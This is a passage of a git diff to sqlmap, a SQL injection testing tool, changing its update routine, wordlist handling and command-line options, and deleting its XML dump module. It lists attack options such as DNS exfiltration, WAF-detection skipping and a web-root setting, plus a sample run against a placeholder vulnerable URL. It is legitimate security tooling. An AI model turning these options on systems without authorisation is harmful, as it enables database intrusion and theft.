checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/ + pollProcess(process, True) + stdout, stderr = process.communicate() + success = not process.returncode + except (IOError, OSError), ex: + success = False + stderr = getSafeExString(ex) if success: - import lib.core.settings - _ = lib.core.settings.REVISION = getRevisionNumber() - logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", _)) + logger.info("%s the latest revision '%s'" % ("already at" if "Already" in stdout else "updated to", getRevisionNumber())) else: - logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) + if "Not a git repository" in stderr: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap')" + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", stderr).strip()) if not success: if IS_WIN: diff --git a/lib/core/wordlist.py b/lib/core/wordlist.py index bc4e486a1..508091e08 100644 --- a/lib/core/wordlist.py +++ b/lib/core/wordlist.py @@ -1,16 +1,16 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import zipfile +from lib.core.common import getSafeExString from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapInstallationException -from lib.core.settings import UNICODE_ENCODING class Wordlist(object): """ @@ -41,7 +41,13 @@ class Wordlist(object): else: self.current = self.filenames[self.index] if os.path.splitext(self.current)[1].lower() == ".zip": - _ = zipfile.ZipFile(self.current, 'r') + try: + _ = zipfile.ZipFile(self.current, 'r') + except zipfile.error, ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException, errMsg if len(_.namelist()) == 0: errMsg = "no file(s) inside '%s'" % self.current raise SqlmapDataException(errMsg) @@ -64,17 +70,13 @@ class Wordlist(object): try: retVal = self.iter.next().rstrip() except zipfile.error, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (self.current, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg except StopIteration: self.adjust() retVal = self.iter.next().rstrip() - try: - retVal = retVal.decode(UNICODE_ENCODING) - except UnicodeDecodeError: - continue if not self.proc_count or self.counter % self.proc_count == self.proc_id: break return retVal diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py deleted file mode 100644 index e0c377962..000000000 --- a/lib/core/xmldump.py +++ /dev/null @@ -1,536 +0,0 @@ -#!/usr/bin/env python - -import codecs -import os -import re -import xml - -import xml.sax.saxutils as saxutils - -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.exception import SqlmapFilePathException -from lib.core.settings import UNICODE_ENCODING -from thirdparty.prettyprint import prettyprint -from xml.dom.minidom import Document -from xml.parsers.expat import ExpatError - -TECHNIC_ELEM_NAME = "Technic" -TECHNICS_ELEM_NAME = "Technics" -BANNER_ELEM_NAME = "Banner" -COLUMNS_ELEM_NAME = "DatabaseColumns" -COLUMN_ELEM_NAME = "Column" -CELL_ELEM_NAME = "Cell" -COLUMN_ATTR = "column" -ROW_ELEM_NAME = "Row" -TABLES_ELEM_NAME = "tables" -DATABASE_COLUMNS_ELEM = "DB" -DB_TABLES_ELEM_NAME = "DBTables" -DB_TABLE_ELEM_NAME = "DBTable" -IS_DBA_ELEM_NAME = "isDBA" -FILE_CONTENT_ELEM_NAME = "FileContent" -DB_ATTR = "db" -UNKNOWN_COLUMN_TYPE = "unknown" -USER_SETTINGS_ELEM_NAME = "UserSettings" -USER_SETTING_ELEM_NAME = "UserSetting" -USERS_ELEM_NAME = "Users" -USER_ELEM_NAME = "User" -DB_USER_ELEM_NAME = "DBUser" -SETTINGS_ELEM_NAME = "Settings" -DBS_ELEM_NAME = "DBs" -DB_NAME_ELEM_NAME = "DBName" -DATABASE_ELEM_NAME = "Database" -TABLE_ELEM_NAME = "Table" -DB_TABLE_VALUES_ELEM_NAME = "DBTableValues" -DB_VALUES_ELEM = "DBValues" -QUERIES_ELEM_NAME = "Queries" -QUERY_ELEM_NAME = "Query" -REGISTERY_ENTRIES_ELEM_NAME = "RegistryEntries" -REGISTER_DATA_ELEM_NAME = "RegisterData" -DEFAULT_DB = "All" -MESSAGE_ELEM = "Message" -MESSAGES_ELEM_NAME = "Messages" -ERROR_ELEM_NAME = "Error" -LST_ELEM_NAME = "List" -LSTS_ELEM_NAME = "Lists" -CURRENT_USER_ELEM_NAME = "CurrentUser" -CURRENT_DB_ELEM_NAME = "CurrentDB" -MEMBER_ELEM = "Member" -ADMIN_USER = "Admin" -REGULAR_USER = "User" -STATUS_ELEM_NAME = "Status" -RESULTS_ELEM_NAME = "Results" -UNHANDLED_PROBLEM_TYPE = "Unhandled" -NAME_ATTR = "name" -TYPE_ATTR = "type" -VALUE_ATTR = "value" -SUCESS_ATTR = "success" -NAME_SPACE_ATTR = 'http://www.w3.org/2001/XMLSchema-instance' -XMLNS_ATTR = "xmlns:xsi" -SCHEME_NAME = "sqlmap.xsd" -SCHEME_NAME_ATTR = "xsi:noNamespaceSchemaLocation" -CHARACTERS_TO_ENCODE = range(32) + range(127, 256) -ENTITIES = {'"': '"', "'": "'"} - -class XMLDump(object): - ''' - This class purpose is to dump the data into an xml Format. - The format of the xml file is described in the scheme file xml/sqlmap.xsd - ''' - - def __init__(self): - self._outputFile = None - self._outputFP = None - self.__root = None - self.__doc = Document() - - def _addToRoot(self, element): - ''' - Adds element to the root element - ''' - self.__root.appendChild(element) - - def __write(self, data, n=True): - ''' - Writes the data into the file - ''' - if n: - self._outputFP.write("%s\n" % data) - else: - self._outputFP.write("%s " % data) - - self._outputFP.flush() - - kb.dataOutputFlag = True - - def _getRootChild(self, elemName): - ''' - Returns the child of the root with the described name - ''' - elements = self.__root.getElementsByTagName(elemName) - if elements: - return elements[0] - - return elements - - def _createTextNode(self, data): - ''' - Creates a text node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - if data is None: - return self.__doc.createTextNode(u'') - else: - escaped_data = saxutils.escape(data, ENTITIES) - return self.__doc.createTextNode(escaped_data) - - def _createAttribute(self, attrName, attrValue): - ''' - Creates an attribute node with utf8 data inside. - The text is escaped to an fit the xml text Format. - ''' - attr = self.__doc.createAttribute(attrName) - if attrValue is None: - attr.nodeValue = u'' - else: - attr.nodeValue = getUnicode(attrValue) - return attr - - def string(self, header, data, sort=True): - ''' - Adds string element to the xml. - ''' - if isinstance(data, (list, tuple, set)): - self.lister(header, data, sort) - return - - messagesElem = self._getRootChild(MESSAGES_ELEM_NAME) - if (not(messagesElem)): - messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) - self._addToRoot(messagesElem) - - if data: - data = self._formatString(data) - else: - data = "" - - elem = self.__doc.createElement(MESSAGE_ELEM) - elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - elem.appendChild(self._createTextNode(data)) - messagesElem.appendChild(elem) - - def lister(self, header, elements, sort=True): - ''' - Adds information formatted as list element - ''' - lstElem = self.__doc.createElement(LST_ELEM_NAME) - lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - if elements: - if sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower()) - except: - pass - - for element in elements: - memberElem = self.__doc.createElement(MEMBER_ELEM) - lstElem.appendChild(memberElem) - if isinstance(element, basestring): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElem.appendChild(self._createTextNode(element)) - elif isinstance(element, (list, tuple, set)): - memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list")) - for e in element: - memberElemStr = self.__doc.createElement(MEMBER_ELEM) - memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string")) - memberElemStr.appendChild(self._createTextNode(getUnicode(e))) - memberElem.appendChild(memberElemStr) - listsElem = self._getRootChild(LSTS_ELEM_NAME) - if not(listsElem): - listsElem = self.__doc.createElement(LSTS_ELEM_NAME) - self._addToRoot(listsElem) - listsElem.appendChild(lstElem) - - def technic(self, technicType, data): - ''' - Adds information about the technic used to extract data from the db - ''' - technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) - technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType)) - textNode = self._createTextNode(data) - technicElem.appendChild(textNode) - technicsElem = self._getRootChild(TECHNICS_ELEM_NAME) - if not(technicsElem): - technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) - self._addToRoot(technicsElem) - technicsElem.appendChild(technicElem) - - def banner(self, data): - ''' - Adds information about the database banner to the xml. - The banner contains information about the type and the version of the database. - ''' - bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) - bannerElem.appendChild(self._createTextNode(data)) - self._addToRoot(bannerElem) - - def currentUser(self, data): - ''' - Adds information about the current database user to the xml - ''' - currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) - textNode = self._createTextNode(data) - currentUserElem.appendChild(textNode) - self._addToRoot(currentUserElem) - - def currentDb(self, data): - ''' - Adds information about the current database is use to the xml - ''' - currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) - textNode = self._createTextNode(data) - currentDBElem.appendChild(textNode) - self._addToRoot(currentDBElem) - - def dba(self, isDBA): - ''' - Adds information to the xml that indicates whether the user has DBA privileges - ''' - isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) - isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA))) - self._addToRoot(isDBAElem) - - def users(self, users): - ''' - Adds a list of the existing users to the xml - ''' - usersElem = self.__doc.createElement(USERS_ELEM_NAME) - if isinstance(users, basestring): - users = [users] - if users: - for user in users: - userElem = self.__doc.createElement(DB_USER_ELEM_NAME) - usersElem.appendChild(userElem) - userElem.appendChild(self._createTextNode(user)) - self._addToRoot(usersElem) - - def dbs(self, dbs): - ''' - Adds a list of the existing databases to the xml - ''' - dbsElem = self.__doc.createElement(DBS_ELEM_NAME) - if dbs: - for db in dbs: - dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) - dbsElem.appendChild(dbElem) - dbElem.appendChild(self._createTextNode(db)) - self._addToRoot(dbsElem) - - def userSettings(self, header, userSettings, subHeader): - ''' - Adds information about the user's settings to the xml. - The information can be user's passwords, privileges and etc.. - ''' - self._areAdmins = set() - userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME) - if (not(userSettingsElem)): - userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) - self._addToRoot(userSettingsElem) - - userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) - userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header)) - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower()) - - for user in users: - userElem = self.__doc.createElement(USER_ELEM_NAME) - userSettingElem.appendChild(userElem) - if user in self._areAdmins: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER)) - else: - userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER)) - - settings = userSettings[user] - - settings.sort() - - for setting in settings: - settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) - settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader)) - settingTextNode = self._createTextNode(setting) - settingsElem.appendChild(settingTextNode) - userElem.appendChild(settingsElem) - userSettingsElem.appendChild(userSettingElem) - - def dbTables(self, dbTables): - ''' - Adds information of the existing db tables to the xml - ''' - if not isinstance(dbTables, dict): - self.string(TABLES_ELEM_NAME, dbTables) - return - - dbTablesElem = self.__doc.createElement(DB_TABLES_ELEM_NAME) - - for db, tables in dbTables.items(): - tables.sort(key=lambda x: x.lower()) - dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - dbTablesElem.appendChild(dbElem) - for table in tables: - tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) - tableElem.appendChild(self._createTextNode(table)) - dbElem.appendChild(tableElem) - self._addToRoot(dbTablesElem) - - def dbTableColumns(self, tableColumns): - ''' - Adds information about the columns of the existing tables to the xml - ''' - - columnsElem = self._getRootChild(COLUMNS_ELEM_NAME) - if not(columnsElem): - columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) - - for db, tables in tableColumns.items(): - if not db: - db = DEFAULT_DB - dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) - dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db)) - columnsElem.appendChild(dbElem) - - for table, columns in tables.items(): - tableElem = self.__doc.createElement(TABLE_ELEM_NAME) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - colList = columns.keys() - colList.sort(key=lambda x: x.lower()) - - for column in colList: - colType = columns[column] - colElem = self.__doc.createElement(COLUMN_ELEM_NAME) - if colType is not None: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType)) - else: - colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) - colElem.appendChild(self._createTextNode(column)) - tableElem.appendChild(colElem) - - self._addToRoot(columnsElem) - - def dbTableValues(self, tableValues): - ''' - Adds the values of specific table to the xml. - The values are organized according to the relevant row and column. - ''' - tableElem = self.__doc.createElement(DB_TABLE_VALUES_ELEM_NAME) - if (tableValues is not None): - db = tableValues["__infos__"]["db"] - if not db: - db = "All" - table = tableValues["__infos__"]["table"] - - count = int(tableValues["__infos__"]["count"]) - columns = tableValues.keys() - columns.sort(key=lambda x: x.lower()) - - tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db)) - tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table)) - - for i in range(count): - rowElem = self.__doc.createElement(ROW_ELEM_NAME) - tableElem.appendChild(rowElem) - for column in columns: - if column != "__infos__": - info = tableValues[column] - value = info["values"][i] - - if re.search("^[\ *]*$", value): - value = "NULL" - - cellElem = self.__doc.createElement(CELL_ELEM_NAME) - cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column)) - cellElem.appendChild(self._createTextNode(value)) - rowElem.appendChild(cellElem) - - dbValuesElem = self._getRootChild(DB_VALUES_ELEM) - if (not(dbValuesElem)): - dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) - self._addToRoot(dbValuesElem) - - dbValuesElem.appendChild(tableElem) - - logger.info("Table '%s.%s' dumped to XML file" % (db, table)) - - def dbColumns(self, dbColumns, colConsider, dbs): - ''' - Adds information about the columns - ''' - for column in dbColumns.keys(): - printDbs = {} - for db, tblData in dbs.items(): - for tbl, colData in tblData.items(): - for col, dataType in colData.items(): - if column in col: - if db in printDbs: - if tbl in printDbs[db]: - printDbs[db][tbl][col] = dataType - else: - printDbs[db][tbl] = {col: dataType} - else: - printDbs[db] = {} - printDbs[db][tbl] = {col: dataType} - - continue - - self.dbTableColumns(printDbs) - - def query(self, query, queryRes): - ''' - Adds details of an executed query to the xml. - The query details are the query itself and its results. - ''' - queryElem = self.__doc.createElement(QUERY_ELEM_NAME) - queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query)) - queryElem.appendChild(self._createTextNode(queryRes)) - queriesElem = self._getRootChild(QUERIES_ELEM_NAME) - if (not(queriesElem)): - queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) - self._addToRoot(queriesElem) - queriesElem.appendChild(queryElem) - - def registerValue(self, registerData): - ''' - Adds information about an extracted registry key to the xml - ''' - registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) - registerElem.appendChild(self._createTextNode(registerData)) - registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME) - if (not(registriesElem)): - registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) - self._addToRoot(registriesElem) - registriesElem.appendChild(registerElem) - - def rFile(self, filePath, data): - ''' - Adds an extracted file's content to the xml - ''' - fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) - fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath)) - fileContentElem.appendChild(self._createTextNode(data)) - self._addToRoot(fileContentElem) - - def setOutputFile(self): - ''' - Initiates the xml file from the configuration. - ''' - if (conf.xmlFile): - try: - self._outputFile = conf.xmlFile - self.__root = None - - if os.path.exists(self._outputFile): - try: - self.__doc = xml.dom.minidom.parse(self._outputFile) - self.__root = self.__doc.childNodes[0] - except ExpatError: - self.__doc = Document() - - self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING) - - if self.__root is None: - self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) - self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) - self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) - self.__doc.appendChild(self.__root) - except IOError: - raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) - - def getOutputFile(self): - return self._outputFile - - def finish(self, resultStatus, resultMsg=""): - ''' - Finishes the dumper operation: - 1. Adds the session status to the xml - 2. Writes the xml to the file - 3. Closes the xml file - ''' - if ((self._outputFP is not None) and not(self._outputFP.closed)): - statusElem = self.__doc.createElement(STATUS_ELEM_NAME) - statusElem.setAttributeNode(self._createAttribute(SUCESS_ATTR, getUnicode(resultStatus))) - - if not resultStatus: - errorElem = self.__doc.createElement(ERROR_ELEM_NAME) - - if isinstance(resultMsg, Exception): - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, type(resultMsg).__name__)) - else: - errorElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNHANDLED_PROBLEM_TYPE)) - - errorElem.appendChild(self._createTextNode(getUnicode(resultMsg))) - statusElem.appendChild(errorElem) - - self._addToRoot(statusElem) - self.__write(prettyprint.formatXML(self.__doc, encoding=UNICODE_ENCODING)) - self._outputFP.close() - - -def closeDumper(status, msg=""): - """ - Closes the dumper of the session - """ - - if hasattr(conf, "dumper") and hasattr(conf.dumper, "finish"): - conf.dumper.finish(status, msg) - -dumper = XMLDump() diff --git a/lib/parse/__init__.py b/lib/parse/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/parse/__init__.py +++ b/lib/parse/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/banner.py b/lib/parse/banner.py index c83c42aa0..bc617084d 100644 --- a/lib/parse/banner.py +++ b/lib/parse/banner.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 154c5d7e3..218f80fd2 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -17,6 +17,7 @@ from optparse import SUPPRESS_HELP from lib.core.common import checkDeprecatedOptions from lib.core.common import checkSystemEncoding +from lib.core.common import dataToStdout from lib.core.common import expandMnemonics from lib.core.common import getUnicode from lib.core.data import cmdLineOptions @@ -30,20 +31,25 @@ from lib.core.settings import BASIC_HELP_ITEMS from lib.core.settings import DUMMY_URL from lib.core.settings import IS_WIN from lib.core.settings import MAX_HELP_OPTION_LENGTH +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import VERSION_STRING from lib.core.shell import autoCompletion from lib.core.shell import clearHistory from lib.core.shell import loadHistory from lib.core.shell import saveHistory -def cmdLineParser(): +def cmdLineParser(argv=None): """ This function parses the command line parameters and arguments """ + if not argv: + argv = sys.argv + checkSystemEncoding() - _ = getUnicode(os.path.basename(sys.argv[0]), encoding=sys.getfilesystemencoding()) + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + _ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding) usage = "%s%s [options]" % ("python " if not IS_WIN else "", \ "\"%s\"" % _ if " " in _ else _) @@ -141,12 +147,21 @@ def cmdLineParser(): help="HTTP authentication credentials " "(name:password)") - request.add_option("--auth-private", dest="authPrivate", - help="HTTP authentication PEM private key file") + request.add_option("--auth-file", dest="authFile", + help="HTTP authentication PEM cert/private key file") request.add_option("--ignore-401", dest="ignore401", action="store_true", help="Ignore HTTP Error 401 (Unauthorized)") + request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", + help="Ignore system default proxy settings") + + request.add_option("--ignore-redirects", dest="ignoreRedirects", action="store_true", + help="Ignore redirection attempts") + + request.add_option("--ignore-timeouts", dest="ignoreTimeouts", action="store_true", + help="Ignore connection timeouts") + request.add_option("--proxy", dest="proxy", help="Use a proxy to connect to the target URL") @@ -157,9 +172,6 @@ def cmdLineParser(): request.add_option("--proxy-file", dest="proxyFile", help="Load proxy list from a file") - request.add_option("--ignore-proxy", dest="ignoreProxy", action="store_true", - help="Ignore system default proxy settings") - request.add_option("--tor", dest="tor", action="store_true", help="Use Tor anonymity network") @@ -168,7 +180,7 @@ def cmdLineParser(): help="Set Tor proxy port other than default") request.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") + help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))") request.add_option("--check-tor", dest="checkTor", action="store_true", @@ -256,7 +268,10 @@ def cmdLineParser(): help="Skip testing for given parameter(s)") injection.add_option("--skip-static", dest="skipStatic", action="store_true", - help="Skip testing parameters that not appear dynamic") + help="Skip testing parameters that not appear to be dynamic") + + injection.add_option("--param-exclude", dest="paramExclude", + help="Regexp to exclude parameters from testing (e.g. \"ses\")") injection.add_option("--dbms", dest="dbms", help="Force back-end DBMS to this value") @@ -356,7 +371,7 @@ def cmdLineParser(): techniques.add_option("--union-from", dest="uFrom", help="Table to use in FROM part of UNION query SQL injection") - techniques.add_option("--dns-domain", dest="dnsName", + techniques.add_option("--dns-domain", dest="dnsDomain", help="Domain name used for DNS exfiltration attack") techniques.add_option("--second-order", dest="secondOrder", @@ -461,14 +476,17 @@ def cmdLineParser(): help="Exclude DBMS system databases when " "enumerating tables") + enumeration.add_option("--pivot-column", dest="pivotColumn", + help="Pivot column name") + enumeration.add_option("--where", dest="dumpWhere", help="Use WHERE condition while table dumping") enumeration.add_option("--start", dest="limitStart", type="int", - help="First query output entry to retrieve") + help="First dump table entry to retrieve") enumeration.add_option("--stop", dest="limitStop", type="int", - help="Last query output entry to retrieve") + help="Last dump table entry to retrieve") enumeration.add_option("--first", dest="firstChar", type="int", help="First query output word character to retrieve") @@ -600,9 +618,6 @@ def cmdLineParser(): general = OptionGroup(parser, "General", "These options can be used " "to set some general working parameters") - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") - general.add_option("-s", dest="sessionFile", help="Load session from a stored (.sqlite) file") @@ -614,9 +629,16 @@ def cmdLineParser(): action="store_true", help="Never ask for user input, use the default behaviour") + general.add_option("--binary-fields", dest="binaryFields", + help="Result fields having binary values (e.g. \"digest\")") + general.add_option("--charset", dest="charset", help="Force character encoding used for data retrieval") + general.add_option("--check-internet", dest="checkInternet", + action="store_true", + help="Check Internet connection before assessing the target") + general.add_option("--crawl", dest="crawlDepth", type="int", help="Crawl the website starting from the target URL") @@ -632,8 +654,7 @@ def cmdLineParser(): general.add_option("--eta", dest="eta", action="store_true", - help="Display for each output the " - "estimated time of arrival") + help="Display for each output the estimated time of arrival") general.add_option("--flush-session", dest="flushSession", action="store_true", @@ -647,6 +668,9 @@ def cmdLineParser(): action="store_true", help="Ignore query results stored in session file") + general.add_option("--har", dest="harFile", + help="Log all HTTP traffic into a HAR file") + general.add_option("--hex", dest="hexConvert", action="store_true", help="Use DBMS hex function(s) for data retrieval") @@ -659,11 +683,7 @@ def cmdLineParser(): action="store_true", help="Parse and display DBMS error messages from responses") - general.add_option("--pivot-column", dest="pivotColumn", - help="Pivot column name") - - general.add_option("--save", dest="saveCmdline", - action="store_true", + general.add_option("--save", dest="saveConfig", help="Save options to a configuration INI file") general.add_option("--scope", dest="scope", @@ -672,6 +692,9 @@ def cmdLineParser(): general.add_option("--test-filter", dest="testFilter", help="Select tests by payloads and/or titles (e.g. ROW)") + general.add_option("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + general.add_option("--update", dest="updateAll", action="store_true", help="Update sqlmap") @@ -719,20 +742,26 @@ def cmdLineParser(): action="store_true", help="Work in offline mode (only use session data)") - miscellaneous.add_option("--page-rank", dest="pageRank", - action="store_true", - help="Display page rank (PR) for Google dork results") - miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", help="Safely remove all content from output directory") + miscellaneous.add_option("--skip-waf", dest="skipWaf", + action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--smart", dest="smart", action="store_true", help="Conduct thorough tests only if positive heuristic(s)") miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap shell") + help="Prompt for an interactive sqlmap shell") + + miscellaneous.add_option("--tmp-dir", dest="tmpDir", + help="Local directory for storing temporary files") + + miscellaneous.add_option("--web-root", dest="webRoot", + help="Web server document root directory (e.g. \"/var/www\")") miscellaneous.add_option("--wizard", dest="wizard", action="store_true", @@ -742,21 +771,24 @@ def cmdLineParser(): parser.add_option("--dummy", dest="dummy", action="store_true", help=SUPPRESS_HELP) - parser.add_option("--pickled-options", dest="pickledOptions", + parser.add_option("--murphy-rate", dest="murphyRate", type="int", + help=SUPPRESS_HELP) + + parser.add_option("--disable-precon", dest="disablePrecon", action="store_true", + help=SUPPRESS_HELP) + + parser.add_option("--disable-stats", dest="disableStats", action="store_true", help=SUPPRESS_HELP) parser.add_option("--profile", dest="profile", action="store_true", help=SUPPRESS_HELP) - parser.add_option("--binary-fields", dest="binaryFields", - help=SUPPRESS_HELP) - - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) - parser.add_option("--force-dns", dest="forceDns", action="store_true", help=SUPPRESS_HELP) + parser.add_option("--force-threads", dest="forceThreads", action="store_true", + help=SUPPRESS_HELP) + parser.add_option("--smoke-test", dest="smokeTest", action="store_true", help=SUPPRESS_HELP) @@ -768,6 +800,14 @@ def cmdLineParser(): parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + # API options + parser.add_option("--api", dest="api", action="store_true", + help=SUPPRESS_HELP) + + parser.add_option("--taskid", dest="taskid", help=SUPPRESS_HELP) + + parser.add_option("--database", dest="database", help=SUPPRESS_HELP) + parser.add_option_group(target) parser.add_option_group(request) parser.add_option_group(optimization) @@ -786,31 +826,33 @@ def cmdLineParser(): # Dirty hack to display longer options without breaking into two lines def _(self, *args): - _ = parser.formatter._format_option_strings(*args) - if len(_) > MAX_HELP_OPTION_LENGTH: - _ = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _ - return _ + retVal = parser.formatter._format_option_strings(*args) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal + return retVal parser.formatter._format_option_strings = parser.formatter.format_option_strings parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) - # Dirty hack for making a short option -hh + # Dirty hack for making a short option '-hh' option = parser.get_option("--hh") option._short_opts = ["-hh"] option._long_opts = [] - # Dirty hack for inherent help message of switch -h + # Dirty hack for inherent help message of switch '-h' option = parser.get_option("-h") option.help = option.help.capitalize().replace("this help", "basic help") - argv = [] + _ = [] prompt = False advancedHelp = True extraHeaders = [] - for arg in sys.argv: - argv.append(getUnicode(arg, encoding=sys.getfilesystemencoding())) + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + for arg in argv: + _.append(getUnicode(arg, encoding=sys.stdin.encoding)) + argv = _ checkDeprecatedOptions(argv) prompt = "--sqlmap-shell" in argv @@ -845,14 +887,14 @@ def cmdLineParser(): if not command: continue elif command.lower() == "clear": - clearHistory() - print "[i] history cleared" + clearHistory() + dataToStdout("[i] history cleared\n") saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) elif command.lower() in ("x", "q", "exit", "quit"): raise SqlmapShellQuitException elif command[0] != '-': - print "[!] invalid option(s) provided" - print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'" + dataToStdout("[!] invalid option(s) provided\n") + dataToStdout("[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'\n") else: saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) @@ -864,10 +906,18 @@ def cmdLineParser(): 